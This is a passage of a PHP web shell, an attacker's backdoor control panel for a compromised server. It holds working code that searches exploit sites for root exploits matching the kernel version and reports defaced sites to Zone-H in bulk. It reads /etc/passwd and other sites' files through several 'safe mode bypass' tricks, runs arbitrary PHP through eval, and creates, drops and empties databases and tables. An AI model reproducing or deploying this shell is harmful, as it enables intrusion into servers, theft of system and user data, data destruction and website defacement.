2277                                                 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
2278                                             } else if ($_GET['rootexploit'] == "shodanhq") {
2279                                                 header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
2280                                             }
2281                                         } else {
2282                                             $Lversion = substr($Lversion, 0, 3);
2283                                             if ($_GET['rootexploit'] == "exploit-db") {
2284                                                 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
2285                                             } else if ($_GET['rootexploit'] == "packetstormsecurity") {
2286                                                 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
2287                                             } else if ($_GET['rootexploit'] == "exploitsearch") {
2288                                                 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
2289                                             } else if ($_GET['rootexploit'] == "shodanhq") {
2290                                                 header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
2291                                             }
2292                                         }
2293                                         //End of Exploit search
2294                                         
2295                                     }
2296                                 } else if (isset($_POST["SendNowToZoneH"])) {
2297                                     $hacker = $_POST['defacer'];
2298                                     $method = $_POST['hackmode'];
2299                                     $neden = $_POST['reason'];
2300                                     $site = $_POST['domain'];
2301                                     if (empty($hacker)) {
2302                                         die("<center><font color=red size=3>[-] You Must Fill the Attacker name !</font></center>");
2303                                     } elseif ($method == "--------SELECT--------") {
2304                                         die("<center><font color=red size=3>[-] You Must Select The Method !</center>");
2305                                     } elseif ($neden == "--------SELECT--------") {
2306                                         die("<center><font color=red size=3>[-] You Must Select The Reason</center>");
2307                                     } elseif (empty($site)) {
2308                                         die("<center><font color=red size=3>[-] You Must Inter the Sites List !</center>");
2309                                     }
2310                                     $i = 0;
2311                                     $sites = explode("
2312 ", $site);
2313                                     echo "<pre class=ml1 style='margin-top:5px'>";
2314                                     while ($i < count($sites)) {
2315                                         if (substr($sites[$i], 0, 4) != "http") {
2316                                             $sites[$i] = "http://" . $sites[$i];
2317                                         }
2318                                         ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2319                                         echo "<font color=lime size=3>Site : " . $sites[$i] . " Posted !</font><br>";
2320                                         ++$i;
2321                                     }
2322                                     echo "<font color=lime size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
2323                                 }
2324                                 // Spread Shell
2325                                 else if (isset($_GET["bypass"])) {
2326                                     if (isset($_GET['copy'])) {
2327                                         if (@copy($_GET['copy'], "test1.php")) {
2328                                             $fh = fopen("test1.php", 'r');
2329                                             echo "<textarea cols=120 rows=20 class=box readonly>" . htmlspecialchars(@fread($fh, filesize("test1.php"))) . "</textarea></br></br>";
2330                                             @fclose($fh);
2331                                             unlink("test1.php");
2332                                         }
2333                                     } else if (isset($_GET['imap'])) {
2334                                         $string = $_GET['imap'];
2335                                         echo "<textarea cols=120 rows=20 class=box readonly>";
2336                                         $stream = imap_open($string, "", "");
2337                                         $str = imap_body($stream, 1);
2338                                         echo "</textarea>";
2339                                     } else if (isset($_GET['sql'])) {
2340                                         echo "<textarea cols=120 rows=20 class=box readonly>";
2341                                         $file = $_GET['ssql'];
2342                                         $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
2343                                         $mysql_files = explode(':', $mysql_files_str);
2344                                         $sql = array("USE $mdb", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A' . time()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS " . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY          '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM $tbl LIMIT 1");
2345                                         mysql_connect($mhost, $muser, $mpass);
2346                                         foreach ($sql as $statement) {
2347                                             $q = mysql_query($statement);
2348                                             if ($q == false) die("FAILED: " . $statement . "
2349 " . "REASON: " . mysql_error() . "
2350 ");
2351                                             if (!$r = @mysql_fetch_array($q, MYSQL_NUM)) continue;
2352                                             echo htmlspecialchars($r[0]);
2353                                             mysql_free_result($q);
2354                                         }
2355                                         echo "</textarea>";
2356                                     } else if (isset($_GET['curl'])) {
2357                                         $ch = curl_init("file://" . $_GET[curl]);
2358                                         curl_setopt($ch, CURLOPT_HEADERS, 0);
2359                                         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2360                                         $file_out = curl_exec($ch);
2361                                         curl_close($ch);
2362                                         echo "<textarea cols=120 rows=20 class=box readonly>" . htmlspecialchars($file_out) . "</textarea></br></br>";
2363                                     } else if (isset($_GET['include'])) {
2364                                         if (file_exists($_GET['include'])) {
2365                                             echo "<textarea cols=120 rows=20 class=box readonly>";
2366                                             @include ($_GET['include']);
2367                                             echo "</textarea>";
2368                                         } else echo "<br><center><font color=red size=3>Can't Read" . $_GET['include'] . "</font></center>";
2369                                     } else if (isset($_GET['id'])) {
2370                                         echo "<textarea cols=120 rows=20 class=box readonly>";
2371                                         for ($uid = 0;$uid < 60000;$uid++) { //cat /etc/passwd
2372                                             $ara = posix_getpwuid($uid);
2373                                             if (!empty($ara)) {
2374                                                 while (list($key, $val) = each($ara)) {
2375                                                     print "$val:";
2376                                                 }
2377                                                 print "
2378 ";
2379                                             }
2380                                         }
2381                                         echo "</textarea>";
2382                                         break;
2383                                     } else if (isset($_GET['tempname'])) {
2384                                         tempnam("/home/" . $_GET['tempname']);
2385                                     } else if (isset($_GET['sym'])) {
2386                                         echo "<textarea cols=120 rows=20 class=box readonly>";
2387                                         $fp = fopen("hack15.txt", "w+");
2388                                         fwrite($fp, "Php Hacker Was Here");
2389                                         @unlink($flib);
2390                                         $sym = "/home/" . $them . "/public_html/" . $k;
2391                                         $link = "/home/" . $you . "/public_html/" . $folder . "/" . $flib;
2392                                         @symlink($sym, $link);
2393                                         if ($k{0} == "/") {
2394                                             echo "<script> window.location = '" . $flib . "'</script>";
2395                                         } else {
2396                                             echo "<pre><xmp>";
2397                                             echo readlink($flib) . "
2398 ";
2399                                             echo "Filesize: " . linkinfo($flib) . "B
2400 
2401 ";
2402                                             echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $folder . "/" . $flib);
2403                                             echo "</textarea>";
2404                                         }
2405                                     } else {
2406 ?>
2407            
2408            <table cellpadding="7" align="center" border="3" style="width:70%;">
2409                <tr>
2410                    <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
2411                </tr>
2412                <tr>
2413                    <td align="center">
2414                        <p>Using copy() function</p>
2415                        <form action="<?php echo $self; ?>" method="get">
2416                        <input type="hidden" name="bypass">
2417                        <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2418                        </form>
2419                    </td>
2420                    <td align="center">
2421                        <p>Using imap() function</p>
2422                        <form action="<?php echo $self; ?>" method="get">
2423                        <input type="hidden" name="bypass">
2424                        <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2425                        </form>
2426                    </td>
2427                </tr>
2428                        
2429                <tr>
2430                    <td align="center">
2431                        <p>Using sql() function</p>
2432                        <form action="<?php echo $self; ?>" method="get">
2433                        <input type="hidden" name="bypass">
2434                        <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2435                        </form>
2436                    </td>
2437                    <td align="center">
2438                        <p>Using Curl() function</p>
2439                        <form action="<?php echo $self; ?>" method="get">
2440                        <input type="hidden" name="bypass">
2441                        <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2442                        </form>
2443                    </td>
2444                </tr>
2445                        
2446                <tr>
2447                    <td align="center">
2448                        <p>Bypass using include()</p>
2449                        <form action="<?php echo $self; ?>" method="get">
2450                        <input type="hidden" name="bypass">
2451                        <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2452                        </form>
2453                    </td>
2454                    <td align="center">
2455                        <p>Using id() function</p>
2456                        <form action="<?php echo $self; ?>" method="get">
2457                        <input type="hidden" name="bypass">
2458                        <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2459                        </form>
2460                    </td>
2461                </tr>
2462                            
2463                <tr>
2464                    <td align="center">
2465                        <p>Using tempnam() function</p>
2466                        <form action="<?php echo $self; ?>" method="get">
2467                        <input type="hidden" name="bypass">
2468                        <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2469                        </form>
2470                    </td>
2471                    <td align="center">
2472                        <p>Using symlink() function</p>
2473                        <form action="<?php echo $self; ?>" method="get">
2474                        <input type="hidden" name="bypass">
2475                        <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2476                        </form>
2477                    </td>
2478                </tr>
2479            </table>
2480            </form>
2481            <?php
2482                                     }
2483                                 } else if (isset($_GET["phpc"])) {
2484                                     // If the comand was sent
2485                                     if (isset($_POST['code']) && $_POST['code'] && isset($_POST['intext']) && $_POST['intext'] == "disp") {
2486                                         // FIlter Some Chars we dont need
2487                                         
2488 ?><br>
2489            <textarea name="code" class="box" cols="120" rows="10"><?php
2490                                         $code = str_replace("<?php", "", $_POST['code']);
2491                                         $code = str_replace("<?", "", $code);
2492                                         $code = str_replace("?>", "", $code);
2493                                         // Evaluate PHP CoDE!
2494                                         htmlspecialchars(eval($code));
2495 ?>
2496            </textarea><?php
2497                                     } else if (isset($_POST['code']) && $_POST['code'] && !isset($_POST['intext'])) {
2498                                         $code = str_replace("<?php", "", $_POST['code']);
2499                                         $code = str_replace("<?", "", $code);
2500                                         $code = str_replace("?>", "", $code);
2501                                         // Evaluate PHP CoDE!
2502                                         
2503 ?><br><font color="red" size="4">Result of execution this PHP-code :</font><br><font color="lime" size="3"><?php htmlspecialchars(eval($code)); ?></font><?php
2504                                     }
2505 ?>
2506     <form method="POST">
2507     <textarea name="code" class="box" cols="120" rows="10"><?php if (isset($_POST['code'])) {
2508                                         echo $_POST['code'];
2509                                     } else { ?>phpinfo();<?php
2510                                     } ?></textarea>
2511    <br /><br />
2512     <input name="submit" value="Execute This COde! " class="but" type="submit" />
2513    <input type="checkbox" name="intext" value="disp"> <font color="lime" size="3">Display in Textarea</font>
2514     </form>
2515     <?php
2516                                 } else if (isset($_GET['database'])) { ?>
2517    <form action=<?php echo $self; ?> method="POST">
2518    <table style="width:90%;" cellpadding="4" align="center">
2519    <tr>
2520        <td colspan="2">Connect To Database</td>
2521    </tr>
2522    <tr>
2523        <td>Server Address :</td>
2524        <td><input type="text" class="box" name="server" value="localhost"></td>
2525        <!--<td rowspan="4"><textarea name="query" cols="60" rows="7" class="box">SHOW DATABASE</textarea>-->
2526    </tr>
2527    <tr>
2528        <td>Username :</td>
2529        <td><input type="text" class="box" name="username" value="root"></td>
2530    </tr>
2531    <tr>
2532        <td>Password:</td>
2533        <td><input type="text" class="box" name="password" value=""></td>
2534    </tr>
2535    
2536    <tr>
2537        <td></td>
2538        <td><input type="submit" value="  Connect  " name="executeit" class="but"></td>
2539    </tr>
2540    </table>
2541    </form>
2542 <?php
2543                                 }
2544                                 // Execute Query
2545                                 else if (isset($_POST["executeit"])) {
2546                                     if (isset($_POST['username']) && isset($_POST['server'])) {
2547                                         $dbserver = $_POST['server'];
2548                                         $dbuser = $_POST['username'];
2549                                         $dbpass = $_POST['password'];
2550                                         setcookie("dbserver", $dbserver);
2551                                         setcookie("dbuser", $dbuser);
2552                                         setcookie("dbpass", $dbpass);
2553                                         header("Location:$self?data");
2554                                     }
2555                                 } else if (isset($_GET['data'])) {
2556                                     listdatabase();
2557                                 } else if (isset($_GET['viewdb'])) {
2558                                     listdatabase();
2559                                 } else if (isset($_GET['action']) && isset($_GET['dbname'])) {
2560                                     if ($_GET['action'] == "createDB") {
2561                                         $dbname = $_GET['dbname'];
2562                                         $dbserver = $_COOKIE["dbserver"];
2563                                         $dbuser = $_COOKIE["dbuser"];
2564                                         $dbpass = $_COOKIE["dbpass"];
2565                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2566                                         mysql_query("create database $dbname", $mysqlHandle);
2567                                         listdatabase();
2568                                     }
2569                                     if ($_GET['action'] == 'dropDB') {
2570                                         $dbname = $_GET['dbname'];
2571                                         $dbserver = $_COOKIE["dbserver"];
2572                                         $dbuser = $_COOKIE["dbuser"];
2573                                         $dbpass = $_COOKIE["dbpass"];
2574                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2575                                         mysql_query("drop database $dbname", $mysqlHandle);
2576                                         mysql_close($mysqlHandle);
2577                                         listdatabase();
2578                                     }
2579                                     if ($_GET['action'] == 'listTables') {
2580                                         listtable();
2581                                     }
2582                                     // Create Tables
2583                                     if ($_GET['action'] == "createtable") {
2584                                         $dbserver = $_COOKIE["dbserver"];
2585                                         $dbuser = $_COOKIE["dbuser"];
2586                                         $dbpass = $_COOKIE["dbpass"];
2587                                         $dbname = $_GET['dbname'];
2588                                         $tablename = $_GET['tablename'];
2589                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2590                                         mysql_select_db($dbname);
2591                                         mysql_query("CREATE TABLE $tablename ( no INT )");
2592                                         listtable();
2593                                     }
2594                                     // Drop Tables
2595                                     if ($_GET['action'] == "dropTable") {
2596                                         $dbserver = $_COOKIE["dbserver"];
2597                                         $dbuser = $_COOKIE["dbuser"];
2598                                         $dbpass = $_COOKIE["dbpass"];
2599                                         $dbname = $_GET['dbname'];
2600                                         $tablename = $_GET['tablename'];
2601                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2602                                         mysql_select_db($dbname);
2603                                         mysql_query("drop table $tablename");
2604                                         listtable();
2605                                     }
2606                                     // Empty Tables
2607                                     if ($_GET['action'] == "empty") {
2608                                         $dbserver = $_COOKIE["dbserver"];
2609                                         $dbuser = $_COOKIE["dbuser"];
2610                                         $dbpass = $_COOKIE["dbpass"];
2611                                         $dbname = $_GET['dbname'];
2612                                         $tablename = $_GET['tablename'];
2613                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2614                                         mysql_select_db($dbname);
2615                                         mysql_query("delete from $tablename");
2616                                         listtable();
2617                                     }
2618                                     // Empty Tables
2619                                     if ($_GET['action'] == "dropField") {
2620                                         $dbserver = $_COOKIE["dbserver"];
2621                                         $dbuser = $_COOKIE["dbuser"];
2622                                         $dbpass = $_COOKIE["dbpass"];
2623                                         $dbname = $_GET['dbname'];
2624                                         $tablename = $_GET['tablename'];
2625                                         $fieldname = $_GET['fieldname'];
2626                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2627                                         mysql_select_db($dbname);
2628                                         $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
2629                                         mysql_select_db($dbname, $mysqlHandle);
2630                                         mysql_query($queryStr, $mysqlHandle);
2631                                         listtable();
2632                                     }
2633                                     // View Table Schema
2634                                     if ($_GET['action'] == "viewSchema") {
2635                                         $dbserver = $_COOKIE["dbserver"];
2636                                         $dbuser = $_COOKIE["dbuser"];
2637                                         $dbpass = $_COOKIE["dbpass"];
2638                                         $dbname = $_GET['dbname'];
2639                                         $tablename = $_GET['tablename'];
2640                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2641                                         mysql_select_db($dbname);
2642                                         echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2643                                         $pResult = mysql_query("SHOW fields FROM $tablename");
2644                                         $num = mysql_num_rows($pResult);
2645                                         echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
2646                                         echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
2647                                         for ($i = 0;$i < $num;$i++) {
2648                                             $field = mysql_fetch_array($pResult);
2649                                             echo "<tr>
2650 ";
2651                                             echo "<td>" . $field["Field"] . "</td>
2652 ";
2653                                             echo "<td>" . $field["Type"] . "</td>
2654 ";
2655                                             echo "<td>" . $field["Null"] . "</td>
2656 ";
2657                                             echo "<td>" . $field["Key"] . "</td>
2658 ";
2659                                             echo "<td>" . $field["Default"] . "</td>
2660 ";
2661                                             echo "<td>" . $field["Extra"] . "</td>
2662 ";
2663                                             $fieldname = $field["Field"];
2664                                             echo "<td><a href='$self?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>
2665 ";
2666                                             echo "</tr>
2667 ";
2668                                         }
2669                                         echo "</table>";
2670                                         echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2671                                     }
2672                                     // Execute Query
2673                                     if ($_GET['action'] == "executequery") {
2674                                         $dbserver = $_COOKIE["dbserver"];
2675                                         $dbuser = $_COOKIE["dbuser"];
2676                                         $dbpass = $_COOKIE["dbpass"];
2677                                         $dbname = $_GET['dbname'];
2678                                         $tablename = $_GET['tablename'];
2679                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2680                                         mysql_select_db($dbname);
2681                                         $result = mysql_query($_GET['executemyquery']);
2682                                         //  results
2683                                         echo "<html>
2684 " . strtoupper($_GET['executemyquery']) . "<br>
2685 <table border =\"1\">
2686 ";
2687                                         $count = 0;
2688                                         while ($row = mysql_fetch_assoc($result)) {
2689                                             echo "<tr>
2690 ";
2691                                             if ($count == 0) // list column names
2692                                             {
2693                                                 echo "<tr>
2694 ";
2695                                                 while ($key = key($row)) {
2696                                                     echo "<td><b>" . $key . "</b></td>
2697 ";
2698                                                     next($row);
2699                                                 }
2700                                                 echo "</tr>
2701 ";
2702                                             }
2703                                             foreach ($row as $r) // list content of column names
2704                                             {
2705                                                 if ($r == '') $r = '<font color=red>NULL</font>';
2706                                                 echo "<td><font color=lime>" . $r . "</font></td>
2707 ";
2708                                             }
2709                                             echo "</tr>
2710 ";
2711                                             $count++;
2712                                         }
2713                                         echo "</table>
2714 
2715 <font color=lime size=3>" . $count . " rows returned.</font>
2716 </html>";
2717                                         echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2718                                     }
2719                                     // View Table Data
2720                                     if ($_GET['action'] == "viewdata") {
2721                                         global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
2722                                         $dbserver = $_COOKIE["dbserver"];
2723                                         $dbuser = $_COOKIE["dbuser"];
2724                                         $dbpass = $_COOKIE["dbpass"];
2725                                         $dbname = $_GET['dbname'];
2726                                         $tablename = $_GET['tablename'];
2727                                         echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2728 ?>
2729            <br><br>
2730            <form>
2731            <input type="hidden" value="<?php echo $_GET['dbname']; ?>" name="dbname">
2732            <input type="hidden" value="<?php echo $_GET['tablename']; ?>" name="tablename">
2733            <input type="hidden" value="executequery" name="action">
2734            <table>
2735                <tr>
2736                    <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
2737                </tr>
2738                <tr>
2739                    <td><input type="submit" value="Execute" class="but"></td>
2740                </tr>
2741            </table>
2742            </form>
2743            <?php
2744                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2745                                         mysql_select_db($dbname);
2746                                         $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
2747                                         $row = mysql_fetch_array($sql);
2748                                         $rowid = $row['COLUMN_NAME'];
2749                                         echo "<br><font size=4 color =lime>Data in Table</font><br>";
2750                                         if ($tablename != "") echo "<font size=3 color=lime>$dbname > $tablename</font><br>";
2751                                         else echo "<font size=3 color=lime>$dbname</font><br>";
2752                                         $queryStr = "";
2753                                         $pag = 0;
2754                                         $queryStr = stripslashes($queryStr);
2755                                         if ($queryStr == "") {
2756                                             if (isset($_REQUEST['page'])) {
2757                                                 $res = mysql_query("select * from $tablename");
2758                                                 $getres = mysql_num_rows($res);
2759                                                 $coun = ceil($getres / 30);
2760                                                 if ($_REQUEST['page'] != 1) $pag = $_REQUEST['page'] * 30;
2761                                                 else $pag = $_REQUEST['page'] * 30;
2762                                                 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
2763                                                 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
2764                                                 $arrcount = 1;
2765                                                 $arrdata[$arrcount] = 0;
2766                                                 while ($row = mysql_fetch_array($sql)) {
2767                                                     $arrdata[$arrcount] = $row[$rowid];
2768                                                     $arrcount++;
2769                                                 }
2770                                             } else {
2771                                                 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
2772                                                 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
2773                                                 $arrcount = 1;
2774                                                 $arrdata[$arrcount] = 0;
2775                                                 while ($row = mysql_fetch_array($sql)) {
2776                                                     $arrdata[$arrcount] = $row[$rowid];
2777                                                     $arrcount++;
2778                                                 }
2779                                             }
2780                                             if ($orderby != "") $queryStr.= " ORDER BY $orderby";
2781                                             echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'><font size=3>Schema</font></a>
2782 ";
2783                                         }
2784                                         $pResult = mysql_query($queryStr);
2785                                         $fieldt = mysql_fetch_field($pResult);
2786                                         $tablename = $fieldt->table;
2787                                         $errMsg = mysql_error();
2788                                         $GLOBALS[queryStr] = $queryStr;
2789                                         if ($pResult == false) {
2790                                             echoQueryResult();
2791                                             return;
2792                                         }
2793                                         if ($pResult == 1) {
2794                                             $errMsg = "Success";
2795                                             echoQueryResult();
2796                                             return;
2797                                         }
2798                                         echo "<hr>
2799 ";
2800                                         $row = mysql_num_rows($pResult);
2801                                         $col = mysql_num_fields($pResult);
2802                                         if ($row == 0) {
2803                                             echo "<font color=red size=3>No Data Exist!</font>";
2804                                             return;
2805                                         }
2806                                         if ($rowperpage == "") $rowperpage = 30;
2807                                         if ($page == "") $page = 0;
2808                                         else $page--;
2809                                         mysql_data_seek($pResult, $page * $rowperpage);
2810                                         echo "<table cellspacing=1 cellpadding=5 border=1 align=center>
2811 ";
2812                                         echo "<tr>
2813 ";
2814                                         for ($i = 0;$i < $col;$i++) {
2815                                             $field = mysql_fetch_field($pResult, $i);
2816                                             echo "<th>";
2817                                             if ($action == "viewdata") echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=" . $field->name . "'>" . $field->name . "</a>
2818 ";
2819                                             else echo $field->name . "
2820 ";
2821                                             echo "</th>
2822 ";
2823                                         }
2824                                         echo "<th colspan=2>Action</th>
2825 ";
2826                                         echo "</tr>
2827 ";
2828                                         $num = 1;
2829                                         $acount = 1;
2830                                         for ($i = 0;$i < $rowperpage;$i++) {
2831                                             $rowArray = mysql_fetch_row($pResult);
2832                                             if ($rowArray == false) break;
2833                                             echo "<tr>
2834 ";
2835                                             $key = "";
2836                                             for ($j = 0;$j < $col;$j++) {
2837                                                 $data = $rowArray[$j];
2838                                                 $field = mysql_fetch_field($pResult, $j);
2839                                                 if ($field->primary_key == 1) $key.= "&" . $field->name . "=" . $data;
2840                                                 if (strlen($data) > 30) $data = substr($data, 0, 30) . "...";
2841                                                 $data = htmlspecialchars($data);
2842                                                 echo "<td>
2843 ";
2844                                                 echo "<font color=lime>$data</font>
2845 ";
2846                                                 echo "</td>
2847 ";
2848                                             }
2849                                             if (!is_numeric($arrdata[$acount])) echo "<td colspan=2>No Key</td>
2850 ";
2851                                             else {
2852                                                 echo "<td><a href='$PHP_SELF?action=editData&$rowid=$arrdata[$acount]&dbname=$dbname&tablename=$tablename'>Edit</a></td>
2853 ";
2854                                                 echo "<td><a href='$PHP_SELF?action=deleteData&$rowid=$arrdata[$acount]&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>
2855 ";
2856                                                 $acount++;
2857                                             }
2858                                         }
2859                                         echo "</tr>
2860 ";
2861                                         echo "</table>";
2862                                         if ($arrcount > 30) {
2863                                             $res = mysql_query("select * from $tablename");
2864                                             $getres = mysql_num_rows($res);
2865                                             $coun = ceil($getres / 30);
2866                                             echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
2867                                             for ($i = 0;$i < $coun;$i++) echo "<option value=$i>$i</option>";
2868                                             echo "</select> <input type=submit value=Go class=but></form>";
2869                                             echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2870                                         }
2871                                     }
2872                                     // Delete Table Data
2873                                     if ($_GET['action'] == "deleteData") {
2874                                         $dbserver = $_COOKIE["dbserver"];
2875                                         $dbuser = $_COOKIE["dbuser"];
2876                                         $dbpass = $_COOKIE["dbpass"];
2877                                         $dbname = $_GET['dbname'];
2878                                         $tablename = $_GET['tablename'];
2879                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2880                                         mysql_select_db($dbname);
2881                                         $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
2882                                         $row = mysql_fetch_array($sql);
2883                                         $row = $row['COLUMN_NAME'];
2884                                         $rowid = $_GET[$row];
2885                                         mysql_query("delete from $tablename where $row = '$rowid'");
2886                                         header("Location:$self?action=viewdata&dbname=$dbname&tablename=$tablename");
2887                                     }
2888                                     // Edit Table Data
2889                                     if ($_GET['action'] == "editData") {
2890                                         global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
2891                                         $dbserver = $_COOKIE["dbserver"];
2892                                         $dbuser = $_COOKIE["dbuser"];
2893                                         $dbpass = $_COOKIE["dbpass"];
2894                                         $dbname = $_GET['dbname'];
2895                                         $tablename = $_GET['tablename'];
2896                                         echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2897 ?>
2898            <br><br>
2899            <form action="<?php echo $self; ?>" method="post">
2900            <input type="hidden" name="tablename" value="<?php echo $tablename; ?>">
2901            <input type="hidden" name="action" value="editsubmitData">
2902            <?php
2903                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2904                                         mysql_select_db($dbname);
2905                                         $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
2906                                         $row = mysql_fetch_array($sql);
2907                                         $row = $row['COLUMN_NAME'];
2908                                         $rowid = $_GET[$row];
2909                                         $pResult = mysql_list_fields($dbname, $tablename);
2910                                         $num = mysql_num_fields($pResult);
2911                                         $key = "";
2912                                         for ($i = 0;$i < $num;$i++) {
2913                                             $field = mysql_fetch_field($pResult, $i);
2914                                             if ($field->primary_key == 1) if ($field->numeric == 1) $key.= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
2915                                             else $key.= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
2916                                         }
2917                                         $key = substr($key, 0, strlen($key) - 4);
2918                                         mysql_select_db($dbname, $mysqlHandle);
2919                                         $pResult = mysql_query($queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle);
2920                                         $data = mysql_fetch_array($pResult);
2921                                         echo "<input type=hidden name=dbname value=$dbname>
2922 ";
2923                                         echo "<input type=hidden name=tablename value=$tablename>
2924 ";
2925                                         echo "<input type=hidden name=$row value=$rowid>";
2926                                         echo "<table cellspacing=1 cellpadding=2 border=1>
2927 ";
2928                                         echo "<tr>
2929 ";
2930                                         echo "<th>Name</th>
2931 ";
2932                                         echo "<th>Type</th>
2933 ";
